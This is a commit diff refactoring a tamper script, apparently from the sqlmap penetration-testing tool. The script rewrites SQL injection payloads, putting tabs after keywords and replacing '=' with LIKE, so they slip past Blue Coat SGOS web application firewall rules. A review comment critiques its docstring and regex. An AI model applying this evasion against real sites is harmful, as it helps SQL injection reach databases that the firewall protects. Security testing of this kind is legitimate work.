
Commit 5352b3e

committed
Refactoring code in tamper/bluecoat.py
1 parent d75598f commit 5352b3e

1 file changed

Lines changed: 14 additions & 23 deletions


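--- a/tamper/bluecoat.py
+++ b/tamper/bluecoat.py
@@ -12,44 +12,35 @@
 from lib.core.enums import DBMS
 from lib.core.enums import PRIORITY
 
-__priority__ = PRIORITY.LOW
+__priority__ = PRIORITY.NORMAL
 
 def dependencies():
 singleTimeWarnMessage("tamper script '%s' is only meant to be run against %s" % (os.path.basename(__file__).split(".")[0], DBMS.MYSQL))
 
-def process(match):
-word = match.group()
-word = "%sLIKE%s" % (" " if word[0] != " " else "", " " if word[-1] != " " else "")
-return word
-
 def tamper(payload, headers=None):
-"""
-First Replaces the space after 'select ' with a valid random blank character.
-Then replace = with like
+"""
+Replaces space character after SQL statement with a valid random blank character.
+Afterwards replace character = with LIKE operator
 
 Example:
 * Input: SELECT id FROM users where id = 1
-* Output: SELECT%09id FROM users where id like 1
+* Output: SELECT%09id FROM users where id LIKE 1
 
 Requirement:
-* MySQL, Bluecoat SGos with Waf activated as documented in
+* MySQL, Blue Coat SGOS with WAF activated as documented in
 https://kb.bluecoat.com/index?page=content&id=FAQ2147
 
 Tested against:
-* MySQL 5.1, SGos Rules
+* MySQL 5.1, SGOS
 
 Notes:
-* Useful to bypass BlueCoat recommanded Waf rule configuration
-"""
+* Useful to bypass Blue Coat's recommended WAF rule configuration
+"""
 
-# ASCII table:
-# TAB 09 horizontal TAB
-blanks = '%09'
-retVal = payload
+retVal = payload
 
-if payload:
-for commands in ['SELECT','UPDATE','INSERT','DELETE']:
-retVal = retVal.replace(commands + ' ', commands + blanks)
-retVal = re.sub(r"\s*=\s*", lambda match: process(match), retVal)
+if payload:
+retVal = re.sub(r"(?i)(SELECT|UPDATE|INSERT|DELETE)\s+", r"\g<1>\t", payload)
+retVal = re.sub(r"\s*=\s*", " LIKE ", retVal)
 
-return retVal
+return retVal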
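Review bot: The docstring added at new lines 21-38 no longer matches what `tamper()` returns: the example still shows `SELECT%09id`, but the new `re.sub(..., r"\g<1>\t", payload)` inserts a literal tab character rather than the string `%09`, and the replacement is fixed, not the "random blank character" the summary line promises. Either document that, e.g. `* Output: SELECT<TAB>id FROM users where id LIKE 1` with a remark that the tab is presumably URL-encoded later in the request pipeline, or keep the previous `%09` replacement text. The commit is titled a refactoring, yet it also makes keyword matching case-insensitive, lets `\s+` swallow whole whitespace runs, and raises `__priority__` from `PRIORITY.LOW` to `PRIORITY.NORMAL`; those behaviour changes deserve a line in the commit message. The pattern also has no `\b` anchors, so with `(?i)` an identifier that merely ends in one of the keywords (a column named `last_update`, say) is now rewritten too, which is probably unintended; `r"(?i)\b(SELECT|UPDATE|INSERT|DELETE)\s+"` would limit it to whole words.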
